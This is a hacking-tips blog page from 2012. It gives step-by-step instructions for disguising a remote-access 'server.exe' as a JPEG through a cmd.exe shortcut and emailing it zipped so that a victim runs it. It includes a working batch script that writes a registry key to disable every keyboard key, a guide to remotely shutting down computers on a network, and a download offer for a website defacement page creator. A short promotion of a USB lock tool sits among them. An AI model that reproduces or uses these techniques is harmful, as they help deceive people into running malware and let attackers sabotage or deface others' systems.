Saturday, October 27, 2012

Hide EXE File In JPG File

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)


3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.


How To Disable Keyboard

Just copy and paste the code below in notepad and save it as “anything.bat”. What it exactly does is modifies the registry value of keyboard layout of each keys and finally disabling all the keys.

@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg



Now its done

To disable this SCRIPT go to Start> Run and type regedit . This will open the registry editor. In the left tree explorer, navigate to following place: 

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout

Delete the SCANCODE MAP key by simply using right click and delete.

Remotely Shutdown Any Computer In Your Network

1.Press Win+R to open Run.

2.Write 'cmd' (without quotations) and press Enter.

3.In the cmd write shutdown -i
   Now press Enter.

4.Now a window will open like this;



5.Click on add to enter the IP Address of the computer that you want to shutdown or restart -OR-If you are connected to any network (like school,office) then click browse to get all the computers of that network.

6.Select anyone of the option what do you want to do (shutdown,restart or annotate unexpected shutdown)

7.Now if you want to warn user about your action than tick the 'Warn users for the action' and set the time-OR-un tick it

8.Now in the last 'Comment' field write any comment and press OK.

Now ITS DONE...

Predator-Protect Computer Using A USB

Now you can protect you PC by just using a USB flash drive. This is possible due to a great software called Predator. Predator locks your PC when you are away, even if your Windows session is still opened. It uses the USB flash drive as an access point. Using the software is really very easy.



Using Predator
  • First of all insert the USB drive.
  • Then run Predator Software.
  • Now just do your work.
  • When you want to leave the computer for some other work just remove the USB drive. Once it is removed, the keyboard and mouse are disabled and the screen darkens.
  • When you return back to your PC, you put the USB flash drive in place and keyboard and mouse are immediately released, and the display is restored.
secure pc with a usb flash drive


Features of Predator
  • Predator is available in both free and professional versions.
  • Predator can send alert messages by Email or by SMS.
  • Predator records all security-related events in a log file: start, alarms, stop. By reading this log, you will know if intruders have tried to use your computer while you have been away.
  • Predator frequently changes the security codes recorded on your USB drive. If an intruder manages to copy your stick, this copy will not work because the codes on your own stick will have changed in the meantime.
  • Predator disables the Windows task manager when you unplug the USB drive. Nobody can stop it with Ctrl-Alt-Del.
  • Predator disables the CD Autorun feature in Windows, to prevent intruders from running malware on specially crafted CDs.
  • Predator lets you regain control of your computer if you lose your stick: when you start the software for the first time, you set a password that will unlock your session if your USB drive is not available.
  • Predator can sound an audible alarm if somebody enters an invalid password.
  • And finally, Predator can protect several PCs with the same USB flash drive, e.g. your home and office computers.



Friday, October 26, 2012

Deface Page Creator v1

ဒီေကာင္ေလးကေတာ႔ ကို္ယ္တိုင္ Deface Page ဖန္တီးလို႔ရေအာင္ပါ
 
 ဒီမွာေဒါင္းလိုက္ပါ   

:)

Related Posts Plugin for WordPress, Blogger...